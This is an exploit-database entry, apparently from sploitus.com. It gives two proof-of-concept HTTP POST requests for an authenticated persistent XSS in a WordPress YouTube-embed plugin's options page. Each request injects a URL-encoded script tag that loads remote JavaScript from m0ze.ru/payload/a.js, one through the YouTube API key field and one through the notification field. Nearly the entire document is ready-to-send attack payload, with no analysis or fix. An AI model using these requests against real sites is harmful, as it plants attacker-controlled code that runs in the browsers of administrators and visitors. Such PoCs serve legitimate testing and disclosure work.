Share
## https://sploitus.com/exploit?id=WPEX-ID:0EEFF1EE-D11E-4D52-A032-5F5BD8A6A2D7
PoC #1 | Authenticated Persistent XSS | Your YouTube API key:

POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=&lyte_yt_api_key=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0



PoC #2 | Authenticated Persistent XSS | &lyte_notification:

POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_yt_api_key=&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0